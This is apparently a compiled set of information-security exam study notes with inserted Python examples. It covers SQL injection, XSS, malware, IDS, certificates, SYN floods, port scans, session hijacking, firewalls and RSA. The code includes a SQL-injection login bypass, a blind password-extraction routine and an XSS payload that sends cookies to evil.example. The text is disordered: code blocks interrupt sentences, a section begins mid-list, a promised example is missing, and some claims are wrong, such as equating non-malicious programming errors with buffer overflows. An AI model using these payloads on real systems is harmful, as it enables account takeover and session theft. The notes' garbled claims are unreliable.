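    return row[0] if row else None


BYPASS_NAME = "alice' --"     # closes the string, comments out the password check


def blind_extract_password(db, user: str, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Variants 9/10: the page only reveals logged-in or not, so ask one
    true/false question per character and read the answer from that."""
    found = ""
    while True:
        for ch in alphabet:
            probe = f"{user}' AND substr(pw, {len(found) + 1}, 1) = '{ch}' --"
            if login_vulnerable(db, probe, "x") is not None:
                found += ch
                break
        else:
            return found          # no character matched: end of the password


def greet_vulnerable(name: str) -> str:
    return f"<p>Hello {name}</p>"                    # reflected XSS


def greet_fixed(name: str) -> str:
    # Escape for the HTML text context.  Attribute values, URLs and inline
    # JavaScript each need their own context-specific encoding.
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


XSS_PAYLOAD = "<script>document.location='//evil.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = make_db()
    print("bypass, vulnerable:", login_vulnerable(db, BYPASS_NAME, "wrong"))
    print("bypass, fixed:     ", login_fixed(db, BYPASS_NAME, "wrong"))
    print("blind extraction:  ", blind_extract_password(db, "alice"))
    print(greet_vulnerable(XSS_PAYLOAD))
    print(greet_fixed(XSS_PAYLOAD))
```

The blind extraction needs one request per candidate character per position and never sees a row of output: the leak is the difference between "logged in" and "not logged in". Time-delay injection (variant 12) works the same way with the response time as the signal.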
ii. Cross-site scripting:
• 19. 1. Cross-site scripting (XSS) attacks are a type of injection in which malicious scripts are injected into an otherwise trusted website.
2. Cross-site scripting attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user.
3. Cross-site scripting is a client-side code injection attack: the injected script runs in the victim's browser with the privileges of the trusted site.
4. An attacker can use XSS to send a malicious script to an unsuspecting user, for example by embedding it in a link (reflected XSS) or by storing it in a comment field that other users view (stored XSS).
5. This malicious script can access any cookies, session tokens or other sensitive information retained by the browser for that site.
6. Cross-site scripts can also rewrite the content of the HTML document/page.

Windows security 5M
1. Windows Security and Maintenance (earlier called Action Center and, before that, Windows Security Center) is a monitoring component of the Windows NT family of operating systems.
2. It monitors the security and maintenance status of the computer.
3. It checks the operation of the personal firewall, anti-virus software and anti-spyware software.
4. Security and Maintenance also reports the working status of Network Access Protection, Windows Update, User Account Control, Windows Error Reporting, and Backup and Restore.
6. It notifies the user of any problem with these criteria.
7. Security and Maintenance consists of three major components:
i. Control Panel applet
ii. Windows service
iii. Application programming interface (API)
8. The Control Panel applet divides the monitored criteria into categories and colour-codes them: yellow indicates a non-critical warning and red indicates a critical warning.
9. The service determines the current state of the settings.
• 20. 10. The service continually monitors the system for changes and notifies the user if it detects a problem.
11. To show notifications, it adds a notification icon to the Windows taskbar.
12. A set of APIs lets programs retrieve, and receive notification of, the aggregate health status reported by Security and Maintenance.
13. These APIs allow programs to confirm whether the system is in a healthy state or not.
14. The Security log (in the Windows Event Log) records logon/logoff activity and other audited security events.
15. The Security log is a tool for troubleshooting problems and for detecting and investigating attempted and successful unauthorised activity.

What are the different types of malware? How do they propagate? 10M
Types of malware:
1. Virus:
i. A virus is malicious code that attaches itself to a host program or document and has the capability to copy itself.
ii. Viruses spread when the software or document they are attached to is transferred from one computer to another by any device or network and is then opened or run.
iii. A computer virus can corrupt or destroy your system.
iv. Viruses are generally destructive.
2. Worm:
i. A worm is a self-contained piece of malicious code that can spread from one computer to another on its own.
ii. Worms are specifically designed to exploit vulnerabilities in network services, and they spread over network and Internet connections without user action.
iii. The big danger that a worm poses is its capability to replicate itself rapidly across many systems.
iv. Worms are sometimes classed as a sub-class of viruses.
3. Trojan horse or Trojan:
i. A Trojan is malicious code disguised as a legitimate program; it propagates by persuading the user to install or run it.
ii. Some Trojans are more annoying than harmful.
• 21. iii. Some Trojans cause serious damage by deleting files and information stored on the system.
iv. Pirated software downloads frequently contain a Trojan.
4. Blended threat:
i. A blended threat is a more sophisticated attack.
ii. It bundles some of the worst aspects of viruses, worms, Trojan horses and other malicious code into a single threat.
iii. A blended threat uses server and Internet vulnerabilities to transmit and spread attacks.
iv. Blended threats cause harm to the infected systems on a network and propagate using multiple methods at once.
5. Spyware:
i. Spyware is a type of malware that spies on you without your knowledge.
ii. It collects a variety of different types of data from your system.
iii. Different types of malware can act as spyware.
iv. Some spyware records keystrokes to steal financial data.
6. Adware:
i. Adware is a type of malware that often comes bundled with spyware.
ii. Adware is any type of software that displays advertising on the computer.
iii. Adware is considered more acceptable than other types of malware.
iv. An example of adware is the Ask Toolbar that was bundled with Oracle's Java installer.
7. Key logger:
i. A key logger runs in the background to record every keystroke made by the user.
ii. Keystrokes can include usernames, passwords, credit card numbers and other sensitive data.
iii. Key loggers upload these keystrokes to a malicious server, where they can be analysed and people can pick out useful passwords and credit card numbers.
iv. Different types of malware can act as key loggers. Employers can also install key loggers on their employees' computers for monitoring purposes.
• 22. 8. Botnet or bot:
i. A bot is a software program created to perform specific operations automatically; a botnet is a network of compromised computers (bots) under the remote control of an attacker.
ii. Bots act like robots: they are snippets of code designed to automate tasks and respond to instructions from a command-and-control server.
iii. A malicious bot is installed on a system without the user's permission, usually by one of the other malware types above.
iv. Websites can guard against bots with CAPTCHA tests that verify users as human. According to many reports, botnets currently pose the biggest threat to the Internet, since they are the platform for DDoS attacks and spam.
9. Rootkit:
i. A rootkit is a set of software tools that hides its presence in the lower layers of the operating system.
ii. A rootkit is a type of malware designed to burrow deep into the computer to avoid detection by security programs and users.
iii. Rootkits continually hide their presence, for example by filtering the output of file, process and network listings.
iv. Users can protect themselves from rootkits by regularly patching vulnerabilities in software, applications and operating systems, updating virus definitions, avoiding suspicious downloads, and scanning from a trusted (offline) boot medium.
10. Ransomware:
i. Ransomware is a type of malware that takes a computer or its data hostage in an effort to extort money from victims.
ii. There are two types of ransomware: lockscreen ransomware and encryption ransomware.
iii. Lockscreen ransomware displays a full-screen image or web page that prevents you from accessing anything on your computer.
iv. Encryption ransomware encrypts your files with a key held by the attacker, preventing you from opening them.

Give two techniques to establish a covert channel. 5M
Techniques to establish a covert channel:
i. Unused header bits
• 23. ii. Optional header fields
iii. Semantic overloading of header fields
iv. Packet and message sequence timing
v. Payload tunnelling
i. Unused header bits:
1. Exploiting protocols such as TCP/IP, it is possible to encode a covert channel in the reserved or unused bits of their headers.
2. If the receiver does not check these bits, or the protocol specification does not impose explicit values on them, hidden data can be transmitted in them.
3. The unused fields in TCP/IP headers can thus be used to establish a hidden communication channel.
4. Malicious software agents use the unused fields of ICMP and TCP/IP packets to establish such channels, so an IDS can treat non-zero reserved bits as a signature.
ii. Semantic overloading of header fields:
1. Here a header field that has a legitimate meaning is given a second, hidden meaning: the sender chooses the field's value so that it carries data while remaining valid for the protocol.
2. Examples are the IP identification field, the TCP initial sequence number and the TCP window size, each of which the sender may choose freely within the protocol rules.
3. Because the field is in legitimate use, a receiver or IDS cannot simply reject it; detection relies on statistical anomalies in the values.
4. The term comes from the linguistic idea of semantic overloading (a word with more than one meaning): the field is "overloaded" with a covert meaning in addition to its normal one.

What is IDS? How does it differ from a honeypot? Discuss the different types of IDS. 10M
IDS:
1. IDS stands for Intrusion Detection System.
2. An Intrusion Detection System (IDS) is a software or hardware device installed on the network (NIDS) or host (HIDS) to detect and report intrusion attempts against the network.
3. An IDS gathers information within a LAN about unauthorised access or misuse.
4. A network IDS is built on a packet sniffer: it captures traffic and analyses it.
• 24. 5. An IDS evaluates a suspected intrusion once it has taken place and signals an alarm.
How an IDS differs from a honeypot:
1. An IDS gathers information about unauthorised access to real systems, whereas a honeypot is a decoy system with no production purpose, whose only value lies in attackers interacting with it.
2. The IDS is designed to protect and monitor a live production environment, whereas the honeypot is intended to draw attackers in.
3. An IDS is a defence, whereas a honeypot is not a defence in itself; it is a source of intelligence about attackers.
4. An IDS will never raise questions of "entrapment", whereas a honeypot might (the legal position depends on the jurisdiction).
5. An IDS is a tool for monitoring and reporting unauthorised system activity, whereas a honeypot attracts attacks for the purpose of analysis.
Types of IDS: network IDS, host IDS (HIDS), protocol-based IDS, application-protocol-based IDS, anomaly-based IDS, misuse (signature)-based IDS, hybrid IDS. Network-based IDS and host-based IDS are the two general types.
i. Network-based IDS:
1. A network-based IDS is the first type of IDS.
2. This type of IDS is deployed at strategic places in the network infrastructure, for example on a mirror port behind the firewall.
3. It captures traffic going across the wire and compares it with a database of known attack signatures.
4. If a packet matches the signature database, actions can be taken such as alerting the administrator, sending a RST to the attacking host to kill the connection, or dynamically modifying firewall rules to block the connection (the last two make it an intrusion prevention system).
5. A network IDS is essentially a sniffer with analysis logic on top.
6. Examples of network IDS: Snort, Cisco network IDS.
ii. Host-based IDS:
• 25. 1. A host-based IDS is the second type of IDS.
2. A host IDS runs as a service or agent on the protected host.
3. A host IDS does not inspect traffic that is not directed at the host it is protecting; instead it watches logs, file integrity and process activity on that host.

Explain the process of generation & verification of digital certificate. 10M
1. A digital certificate is a digital form of identification.
2. A digital certificate is a digital credential that provides information about the identity of an entity and other information.
3. A digital certificate is issued by an authority called a certification authority (CA).
4. A digital certificate is valid only for a specific period of time.
6. A relying party knows it is valid because a trusted certification authority has issued (signed) the certificate.
7. Digital certificates provide support for public-key cryptography because they contain the public key of the entity identified in the certificate.
8. Digital certificates are based on public-key cryptography for authentication.
9. Generation: at the time of issue of a digital certificate, the issuing certification authority hashes the certificate contents (items a to j below) and signs the hash with its own private key; the signature is appended as item k.
10. The structure of a digital certificate (X.509) is standardised so that information within the certificate can be reliably retrieved and understood.
11. A digital certificate contains:
a. Version number
b. Serial number
c. Certificate (signature) algorithm identifier
d. Issuer name
e. Validity period
f. Subject name
g. Subject public key information
• 26. h. Issuer unique identifier
i. Subject unique identifier
j. Extensions
k. Certification authority's digital signature
12. Digital signature technology allows the recipient of a signed message (here, the certificate) to verify its real origin and its integrity.
13. The purpose of digital signature verification is to ascertain whether a given message has been signed by the private key that corresponds to a given public key. For a certificate, that public key is the issuing CA's, taken from the verifier's trust store, not from the message being verified.
14. Digital signature verification includes the following steps:
a. Message digest recovery
b. Digest evaluation
c. Digest comparison
15. Message digest recovery: the digest was signed (in the RSA description, "encrypted") with the issuer's private key. The verifier recovers it by applying the issuer's public key to the signature.
16. Digest evaluation: the message cannot be derived from the digest itself, so the recipient must re-evaluate the digest over the received message using exactly the same hashing algorithm the issuer used.
17. Digest comparison: the recovered digest and the evaluated digest are compared. If they match, the signature is verified, and the recipient can accept the message as coming unaltered from the issuer. For a certificate the verifier also checks the validity period and that the issuer name matches the CA certificate used.
18. If the digital signature is not genuine, recovering the digest with the public key will not yield the hash value of the original message.
19. If the message was changed after signing, the hash value calculated from the changed message will differ from the original, because two different messages correspond to different hash values.
20. If the public key does not correspond to the private key used for signing, the digest obtained by applying the wrong key to the signature will not be the correct one.
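Steps 9 and 12 to 20, generation and verification, in running code. This is an added example, not code from the slides: textbook RSA over a SHA-256 digest, a CA that issues a minimal certificate, and a relying party that verifies it against a trust store. The certificate is a JSON dictionary rather than X.509, the key sizes are chosen for speed, and the "Example CA" name and field names are this example's own. Textbook RSA without padding is not secure for real use; real CAs sign with RSA-PSS, PKCS#1 v1.5 or ECDSA over DER-encoded X.509.

```python
"""Generation and verification of a digital signature with textbook RSA, and
a CA issuing and a relying party verifying a minimal certificate.

Added example, not code from the slides.  Textbook RSA without padding is
insecure in practice (real CAs use RSA-PSS / PKCS#1 v1.5 or ECDSA over X.509
DER); the certificate here is a JSON dict, not X.509."""
import hashlib
import json
import math
import random


def _is_probable_prime(n: int, rng, rounds: int = 32) -> bool:
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):                          # Miller-Rabin
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int, rng) -> int:
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand, rng):
            return cand


def keygen(bits: int = 1024, seed=None):
    """Returns (public (n, e), private (n, d)).  n must exceed the 256-bit digest."""
    rng = random.Random(seed)
    e = 65537
    while True:
        p, q = _random_prime(bits // 2, rng), _random_prime(bits // 2, rng)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return (p * q, e), (p * q, pow(e, -1, phi))


def digest_int(message: bytes) -> int:
    return int.from_bytes(hashlib.sha256(message).digest(), "big")


def sign(private, message: bytes) -> int:
    """Generation: hash the message, then apply the private key to the digest."""
    n, d = private
    return pow(digest_int(message), d, n)


def verify(public, message: bytes, signature: int) -> bool:
    n, e = public
    recovered = pow(signature, e, n)       # step 15: recover the digest with the public key
    evaluated = digest_int(message)        # step 16: re-hash the received message
    return recovered == evaluated          # step 17: compare


def tbs_bytes(cert: dict) -> bytes:
    """'To be signed' part: every field except the signature, canonically encoded."""
    return json.dumps({k: v for k, v in cert.items() if k != "signature"},
                      sort_keys=True).encode()


def issue_certificate(ca_private, subject: str, subject_public, not_before: int, not_after: int) -> dict:
    cert = {"issuer": "Example CA", "subject": subject, "public_key": list(subject_public),
            "not_before": not_before, "not_after": not_after}
    cert["signature"] = sign(ca_private, tbs_bytes(cert))
    return cert


def verify_certificate(cert: dict, trust_store: dict, now: int) -> bool:
    """The CA's public key comes from the verifier's trust store, never from the cert."""
    ca_public = trust_store.get(cert["issuer"])
    if ca_public is None or not (cert["not_before"] <= now <= cert["not_after"]):
        return False
    return verify(ca_public, tbs_bytes(cert), cert["signature"])


if __name__ == "__main__":
    ca_pub, ca_priv = keygen(512, seed=1)
    sub_pub, _ = keygen(512, seed=2)
    cert = issue_certificate(ca_priv, "www.example.com", sub_pub, 1000, 2000)
    print("valid at t=1500:", verify_certificate(cert, {"Example CA": ca_pub}, 1500))
    print("valid at t=2500:", verify_certificate(cert, {"Example CA": ca_pub}, 2500))
```

The three failure cases of steps 18 to 20 fall out of `verify`: a forged signature or a tampered message changes one side of the comparison, and the wrong public key changes the recovered value. `verify_certificate` adds the two checks a certificate needs on top of the signature: the validity period, and that the issuer's key was looked up in the trust store rather than trusted because it appeared in the certificate.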
2. ARP spoofing is a malicious technique that causes the redirection of network traffic to a hacker.
3. ARP spoofing may denote sniffing out LAN addresses on both wired and wireless LAN networks.
4. The concept behind ARP spoofing is to send bogus ARP messages onto an Ethernet LAN; the attack may modify traffic or block it altogether.
5. There are three types of ARP spoofing:
   a. Man-in-the-middle attacks: these involve traffic modification.
   b. Denial-of-service attacks: these involve a fake MAC address attached to the user's default gateway.
   c. Passive sniffing: this happens when traffic is sent to the user's default gateway through their IP address.
6. A useful and non-malicious use of ARP spoofing is hotels employing the technique to allow guests to access the Internet from their laptops.

TCP SYN flood attack:
1. TCP SYN flood is a type of Distributed Denial of Service (DDoS) attack.
2. It exploits part of the normal TCP three-way handshake to consume resources on the targeted server and render it unresponsive.
3. In this attack the offender sends TCP connection requests faster than the targeted machine can process them, which causes network saturation.
4. In a SYN flood attack, the attacker sends repeated SYN packets to every port on the targeted server using a fake IP address. The server is unaware of the attack and receives multiple, apparently legitimate requests to establish communication. It responds to each attempt with a SYN-ACK packet from each open port.
5. The malicious client either does not send the expected ACK or, if the IP address is spoofed, never receives the SYN-ACK in the first place.
6. Either way, the server under attack will wait for acknowledgement of its SYN-ACK packet for some time.

Port scanning:
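Added example, not from these notes: a detector for the half-open-connection pattern described in items 4-6 of the TCP SYN flood section, run over constructed packet records (all addresses are documentation ranges, not real hosts).

```python
from collections import defaultdict

# Constructed packet records (time, src, dst, tcp_flags) in capture order; not real traffic.
# 192.0.2.10 completes the three-way handshake; 40 spoofed sources send one SYN each, the
# server answers every one with SYN-ACK (item 4), and no ACK ever comes back (item 5).
PACKETS = [(0, "192.0.2.10", "10.0.0.5", "SYN"),
           (0, "10.0.0.5", "192.0.2.10", "SYN-ACK"),
           (1, "192.0.2.10", "10.0.0.5", "ACK")]
PACKETS += [(t, f"203.0.113.{t}", "10.0.0.5", "SYN") for t in range(1, 41)]
PACKETS += [(t, "10.0.0.5", f"203.0.113.{t}", "SYN-ACK") for t in range(1, 41)]

def half_open_by_server(packets):
    """Track each (client, server) pair through the handshake and return, per server, the set
    of clients stuck in SYN-RECEIVED: the server sent SYN-ACK and is still waiting (item 6)."""
    state = {}   # (client, server) -> "SYN" | "SYN-RECEIVED" | "ESTABLISHED"
    for _ts, src, dst, flags in packets:
        if flags == "SYN":
            state[(src, dst)] = "SYN"
        elif flags == "SYN-ACK" and state.get((dst, src)) == "SYN":
            state[(dst, src)] = "SYN-RECEIVED"        # server now holds a connection entry
        elif flags == "ACK" and state.get((src, dst)) == "SYN-RECEIVED":
            state[(src, dst)] = "ESTABLISHED"
    half_open = defaultdict(set)
    for (client, server), s in state.items():
        if s == "SYN-RECEIVED":
            half_open[server].add(client)
    return half_open

def syn_flood_alerts(packets, threshold=20):
    """One alert per server holding at least `threshold` half-open connections; the count of
    distinct clients is reported because a flood from spoofed addresses shows many of them."""
    return [(server, len(clients)) for server, clients in half_open_by_server(packets).items()
            if len(clients) >= threshold]

if __name__ == "__main__":
    print(syn_flood_alerts(PACKETS))
```

Mitigations such as SYN cookies or a shorter SYN-RECEIVED timeout reduce what each half-open entry costs the server.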
1. The act of systematically scanning a computer's ports is called port scanning.
2. Port scanning has legitimate uses in managing networks.
3. Port scanning can also be malicious in nature.
4. Types of port scans:
   i. Vanilla: the scanner attempts to connect to all 65,535 ports.
   ii. Strobe: a more focused scan looking only for known services to exploit.
   iii. Fragmented packets: the scanner sends packet fragments that get through simple packet filters in a firewall.
   iv. UDP: the scanner looks for open UDP ports.
   v. Sweep: the scanner connects to the same port on more than one machine.
   vi. FTP bounce: the scanner goes through an FTP server in order to disguise the source of the scan.
   vii. Stealth scan: the scanner blocks the scanned computer from recording the port scan activities.
5. Port scanning is not a crime.
6. There is no way to stop someone from port scanning your computer while you are on the Internet, because accessing an Internet server opens a port, which opens a door to your computer.
7. There are software products that can stop a port scanner from doing any damage to your system.

What is session hijacking? How does it occur? Give two ways to prevent a session hijack. 10M

1. The session hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed with a session token.
2. A session token is composed of a string of variable width, and it could be used in the URL, in a cookie, etc.
3. The session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the web server.
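Added example, not from these notes, of telling a vanilla scan from a sweep (types i and v in the port scan list above) in constructed connection-attempt records; the record format and the thresholds are assumptions.

```python
from collections import defaultdict

# Constructed connection-attempt records (time, src_ip, dst_ip, dst_port), as a firewall deny
# log might provide; not real data. One source walks 30 ports on one host (vanilla), one hits
# port 445 on 12 hosts (sweep), and one ordinary client repeatedly connects to 10.0.0.5:443.
ATTEMPTS = (
    [(t, "198.51.100.7", "10.0.0.5", port) for t, port in enumerate(range(1, 31))]
    + [(t, "203.0.113.9", f"10.0.0.{h}", 445) for t, h in enumerate(range(1, 13))]
    + [(t, "192.0.2.44", "10.0.0.5", 443) for t in range(5)]
)

def classify_sources(attempts, port_threshold=20, host_threshold=10):
    """Per source IP: VANILLA_SCAN (many distinct ports on one host), SWEEP (one port on many
    hosts), both, or NORMAL. Thresholds are tuning knobs; a production detector also bounds
    the time window it counts over."""
    ports_per_host = defaultdict(lambda: defaultdict(set))   # src -> dst -> {ports}
    hosts_per_port = defaultdict(lambda: defaultdict(set))   # src -> port -> {dsts}
    for _ts, src, dst, port in attempts:
        ports_per_host[src][dst].add(port)
        hosts_per_port[src][port].add(dst)
    verdicts = {}
    for src in ports_per_host:
        tags = []
        if any(len(ports) >= port_threshold for ports in ports_per_host[src].values()):
            tags.append("VANILLA_SCAN")
        if any(len(hosts) >= host_threshold for hosts in hosts_per_port[src].values()):
            tags.append("SWEEP")
        verdicts[src] = tags or ["NORMAL"]
    return verdicts

if __name__ == "__main__":
    for src, tags in classify_sources(ATTEMPTS).items():
        print(src, tags)
```

Fragmented, UDP and stealth scans (types iii, iv and vii) may never produce a completed connection attempt, so this kind of counting must be fed from packet-level sensor data to catch them.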
4. The session token could be compromised in different ways:
   i. Predictable session token
   ii. Session sniffing
   iii. Client-side attacks (XSS, malicious JavaScript code, Trojans, etc.)
   iv. Man-in-the-middle attack
   v. Man-in-the-browser attack
5. Session hijacking can be done at two levels:
   I. Network level
   II. Application level

I. Network level: network-level hijacking involves TCP and UDP sessions.

A. TCP session hijacking:
1. TCP hijacks are meant to intercept already established TCP sessions between any two communicating parties, then pretend to be one of them and redirect the TCP traffic to the attacker by injecting spoofed IP packets, so that user commands are processed on behalf of the authenticated host of the session.
2. It desynchronizes the session between the actual communicating parties by intruding itself in between.
3. Authentication is only required at the time of establishing the connection.
4. An already established connection can be easily stolen without going through any sort of authentication or other security measures.
5. TCP session hijacks can be implemented in the following ways:
   i. Middle man attack
   ii. Blind attack
   iii. IP spoofing
i. Middle man attack: a middle man attack involves using a packet sniffer to intercept the communication between the client and the server.
ii. Blind attack: the attacker is not able to sniff the packets and must guess the correct sequence number expected by the server.
iii. IP spoofing: when a computer outside of your network pretends to be a trusted computer within the network, this action by the attacker is called IP spoofing.

B. UDP session hijacking:
1. UDP does not use packet sequencing and synchronizing.
2. It is easier to hijack a UDP session than a TCP session.
3. The hijacker simply has to forge a server reply to a client UDP request before the server can respond.
4. If sniffing is used, it is easier to control the traffic coming from the server side and thus to block the server's reply to the client in the first place.

II. Application level:
1. Application-level session hijacking occurs with HTTP sessions.
2. At this level a hijacker can not only hijack already existing sessions.
3. The hijacker can also create new sessions from the stolen data.
4. HTTP session hijacking:
   i. HTTP session hijacking involves obtaining the session ID of the session.
   ii. The session ID is the only unique identifier of the HTTP session.
   iii. Session IDs can be found in three places: in the URL received by the browser for the HTTP GET request, in cookies stored on the client's computer, and within form fields.

Methods to prevent session hijacking:
1. Regenerating the session ID after a successful login: this method prevents session fixation, because the attacker does not know the session ID of the user after he has logged in.
2. Using a long random number or string as a session key:
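Added example, not from these notes, of prevention method 1 (regenerate the session ID after login) and method 2 (a long random session key), plus the cookie attributes that back method 3; the SessionStore class, the cookie name SESSIONID and the 32-byte token length are assumptions.

```python
import secrets

class SessionStore:
    """Constructed server-side session store; illustrates prevention methods 1 and 2."""

    def __init__(self, token_bytes: int = 32):
        self.token_bytes = token_bytes
        self.sessions = {}   # session ID -> {"user": str or None, "authenticated": bool}

    def _new_id(self) -> str:
        # Method 2: 32 bytes (256 bits) from the OS CSPRNG, so the ID cannot be predicted or
        # found by trial and error; never a counter, timestamp or username-derived value.
        return secrets.token_urlsafe(self.token_bytes)

    def start(self) -> str:
        """Anonymous pre-login session (login form, shopping cart)."""
        sid = self._new_id()
        self.sessions[sid] = {"user": None, "authenticated": False}
        return sid

    def login(self, sid: str, user: str) -> str:
        """Method 1: after a successful login, retire the pre-login ID and issue a fresh one."""
        self.sessions.pop(sid, None)          # an ID fixed or sniffed before login is now useless
        new_sid = self._new_id()
        self.sessions[new_sid] = {"user": user, "authenticated": True}
        return new_sid

    def lookup(self, sid: str):
        return self.sessions.get(sid)

def session_cookie_header(sid: str) -> str:
    """Cookie attributes that support method 3 and blunt the client-side attacks of item 4:
    Secure = sent only over TLS (defeats sniffing), HttpOnly = unreadable by page JavaScript."""
    return f"Set-Cookie: SESSIONID={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"

def fixation_scenario() -> dict:
    """A pre-login ID known to a third party must no longer resolve after the user logs in."""
    store = SessionStore()
    sid_before = store.start()
    sid_after = store.login(sid_before, "alice")
    return {
        "ids_differ": sid_before != sid_after,
        "old_id_rejected": store.lookup(sid_before) is None,
        "new_id_user": store.lookup(sid_after)["user"],
        "id_length": len(sid_after),              # 43 URL-safe characters for 32 random bytes
    }

if __name__ == "__main__":
    print(fixation_scenario())
```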
This reduces the risk that an attacker could simply guess a valid session key through trial and error or brute force attacks.
3. Encryption of the data passed between the parties: this technique is widely relied upon by web-based e-commerce services, as it completely prevents sniffing-style attacks. Some services make additional checks against the identity of the user.

What is a firewall? Explain different types of firewalls and specify at which layer of the Internet stack they operate. 10M

Firewall:
1. A firewall is a system that provides network security by filtering incoming and outgoing network traffic based on a set of user-defined rules.
2. A firewall is hardware or software which functions in a networked environment to block unauthorized access while permitting authorized communications.
3. The purpose of a firewall is to reduce or eliminate the occurrence of unwanted network communications while allowing all legitimate communication to flow freely.
4. A firewall performs actual actions such as blocking and filtering.
5. A firewall restricts access to your network by deciding which packets should be allowed.
6. In most server infrastructures, firewalls provide an essential layer of security that, combined with other measures, prevents attackers from accessing your servers in malicious ways.

Types of firewall: Packet Filtering Firewall, Stateful-inspection Firewall, Network Address Translation (NAT) Firewall, Application Based Firewall, Hybrid firewalls.

A. Packet Filtering Firewall:
   i. Packet filtering firewalls work by inspecting individual packets in isolation.
   ii. A packet filtering firewall is also called a stateless firewall.
   iii. They are unaware of connection state.
   iv. They can only allow or deny packets based on individual packet headers.
B. Stateful-inspection Firewall:
   i. A stateful firewall determines the connection state of packets.
   ii. This makes them much more flexible than stateless firewalls.
   iii. They work by collecting related packets until the connection state can be determined before any firewall rules are applied to the traffic.
C. Network Address Translation (NAT) Firewall:
   i. A Network Address Translation firewall performs the process in which a network device or a firewall assigns a public address to a computer or group of computers in a private network.
   ii. The main use of this firewall is to limit the number of public IP addresses an organization or company must use, for economy and security purposes.
   iii. Network address translation is the process of modifying IP information in IP packets.
D. Application Based Firewall:
   i. Application firewalls go one step further by analyzing the data being transmitted.
   ii. This allows network traffic to be matched against firewall rules that are specific to individual services or applications.
   iii. These are also known as proxy-based firewalls.
E. Hybrid firewalls:
   i. A hybrid firewall combines features and functions from other types of firewalls.
   ii. Hybrid firewalls use multiple approaches within the same device.

Non-malicious programming errors 5M

1. Non-malicious programming errors are also known as buffer overflows.
2. A buffer overflow is the computing equivalent of trying to pour two liters of water into a one-liter pitcher.
3. It can also be described as trying to copy 4 GB of data onto a 2 GB drive.
4. This is a stack-based buffer overflow, and it is also known as smashing the stack.
5. Assume a web form that asks the user to enter data such as the name, age and date of birth of the user.
6. The information entered by the user is then sent to a server, and the server writes the data entered to a buffer that can hold N characters.
7. If the server software does not verify that the length of the data is at most N characters, then a buffer overflow will occur.
8. Any overflowing data will overwrite something important and cause the computer to crash.
9. This problem can be explained using software which is used for authentication.
10. The decision of the authentication resides in a single bit. If a buffer overflow overwrites this authentication bit, then an unauthorized user can authenticate as the actual user.
11. Such errors cause program malfunction but do not cause more harm to the system.
12. There may be loss of some important data in this type of error.

Multilevel access control 5M

1. Multilevel access control is also known as label-based access control.
2. Multilevel security or multiple levels of security (MLS) is the application of a computer system to process information with incompatible classifications.
3. It allows users to classify objects and users with security labels.
4. It prevents users from obtaining access to information for which they lack authorization.
5. The security labels are based on hierarchical security levels and non-hierarchical security categories.
6. A multilevel security solution uses the multilevel security feature in the operating system.
7. It prevents unauthorized users from accessing information at a higher classification than their authorization.
8. It also prevents users from declassifying information.
9. Using multilevel security with row-level granularity, a user can define strong security for database objects and perform security checks.
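Added example, not part of these notes, implementing label dominance, the no-read-up rule (item 7), the no-write-down rule that prevents declassification (item 8) and the row-level check of item 9; the level names, categories and sample rows are constructed.

```python
from dataclasses import dataclass

# Hierarchical security levels (item 5); a higher number means more sensitive.
LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2, "TOP_SECRET": 3}

@dataclass(frozen=True)
class Label:
    level: str
    categories: frozenset   # non-hierarchical categories (compartments), e.g. {"HR", "FINANCE"}

    def dominates(self, other: "Label") -> bool:
        """A label dominates another if its level is at least as high AND it holds every
        category of the other; both conditions are required (item 5)."""
        return LEVELS[self.level] >= LEVELS[other.level] and self.categories >= other.categories

def can_read(subject: Label, obj: Label) -> bool:
    """Item 7 (no read up): the subject's clearance must dominate the object's label."""
    return subject.dominates(obj)

def can_write(subject: Label, obj: Label) -> bool:
    """Item 8 (no write down): a subject may only write to objects whose label dominates its
    own, so information can never be copied to a lower classification."""
    return obj.dominates(subject)

# Constructed table rows, each carrying its own label (row-level granularity, item 9).
ROWS = [
    {"id": 1, "data": "public notice",  "label": Label("UNCLASSIFIED", frozenset())},
    {"id": 2, "data": "salary table",   "label": Label("CONFIDENTIAL", frozenset({"HR"}))},
    {"id": 3, "data": "audit findings", "label": Label("SECRET", frozenset({"FINANCE"}))},
    {"id": 4, "data": "merger plan",    "label": Label("SECRET", frozenset({"HR", "FINANCE"}))},
]

def visible_row_ids(subject: Label, rows=ROWS) -> list:
    """Row-level security check: the ids of the rows the subject is authorized to view."""
    return [row["id"] for row in rows if can_read(subject, row["label"])]

if __name__ == "__main__":
    analyst = Label("SECRET", frozenset({"FINANCE"}))
    print("analyst sees rows", visible_row_ids(analyst))
    print("analyst may declassify:", can_write(analyst, Label("UNCLASSIFIED", frozenset())))
```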
10. Row-level security checks allow you to control which users have authorization to view, modify, or perform other actions on specific rows of data.
11. The Multilevel Access Control Scheme in Transparent Computing (MACTC) is designed to protect user data with different security levels and to provide multilevel access control and valid identity authentication.

Explain RSA algorithm for public key encryption. Given modulus N=143 and public key=7, find the values of p, q, phi(n), and private key d. Can we choose value of e=5? Justify.

RSA algorithm for public key encryption:
1. RSA is one of the public key cryptosystems, and it is widely used for secure data transmission.
2. In this cryptosystem two keys are used, for the encryption and decryption purposes.
3. The public key is used for encryption and the private key is used for decryption.
4. The two keys, public key and private key, differ from each other.
5. The encryption key is public, i.e. it is the same for every user or sender.
6. The decryption key is different for each user or receiver.
7. RSA is an asymmetric cryptographic algorithm.
8. RSA is also called public key cryptography.
9. The public key is used to encrypt the message and the private key is used to decrypt the message; the encrypted message can only be decrypted with the private key.
10. The process of encryption and decryption in the RSA algorithm:
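Added example, not the notes' own working, that derives p, q, ɸ(n) and d for the question's N=143 and public key e=7, and applies the gcd test of the key-generation step to e=5; trial-division factoring is only possible because the modulus is tiny.

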